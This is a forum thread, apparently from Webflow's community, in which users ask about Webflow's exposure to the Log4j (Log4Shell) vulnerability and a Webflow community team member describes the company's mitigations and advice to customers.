as the planet is on fire with this new vulnerability discovery, I haven’t found any communication or elements that inform me on the measures to take for us who are users of Webflow services.
One of my clients just asked me about the exposure of his website (or via his website) to the log4Shell threat, and I am unable to answer him about the Webflow expoistion, and about the conservative measures that may have been taken.
Can anyone tell me more?
I invite Webflow to make a communication to its users without delay to inform them of their exposure to the risk, and I hope, to reassure us.
I understand that Webflow utilises NGINX web servers and therefore would not be affected by the Log4j vulnerability, however this is only my guess as a Webflow user. I too, on behalf of concerned clients, need an official response from Webflow.
@stephane This is a great question. I’ve just sent an email to webflow partner support to know more about this. I’ll keep you posted if / when I get an answer.
I don’t have access to the internals to rule it out but if they did run Log4s internally it’s not available publicly as it would be firewalled off. I would not be concerned about it since it would be trivial to upgrade to mitigate any threat. Why not open a trouble ticket to see what Webflow has to say. They have been quiet in the forums lately.
Hi all! Matthew here from Webflow’s Community Team, following up regarding the Apache Log4j vulnerability issue.
Webflow’s platform is not built upon Java, nor uses Log4j directly. We are aware of the follow up CVEs: CVE 2021-45046 and CVE-2021-45105, and have mitigated these issues. At this time, we have completed all tasks that we are able to directly mitigate, and we will continue to monitor our downstream partners.*
Here are the actions Webflow has taken:
We have enabled Web Application Firewall (WAF) detection and blocking rules against this vector, and confirmed coverage of all server and API endpoints.*
We have further validated our WAF rules and confirmed that our coverage is complete.*
We have engaged vendors and downstream dependent partners to assess if they are affected, and monitor their efforts to remediate.*
We have implemented rules within our EDR tools to monitor corporate and employee endpoints.*
Here are the actions we recommend our customers take at this time:*
We recommend that you follow* AWS’s Log4j updates, as we are unable to push Amazon AWS to accelerate patching these services. We ask that you follow those updates directly instead of relying on us to relay this information.
If any of your sites have forms with webhooks configured, that data is sent to your webhook service provider, and may include JNDI payloads. We advise that you follow up with any service providers handling those requests and ensure they have mitigated this vector.*
We hope the information shared here is helpful! Please feel free to reach out to our Customer Support Team (support@webflow.com) with any additional questions, concerns, or feedback, and we’ll be happy to assist.*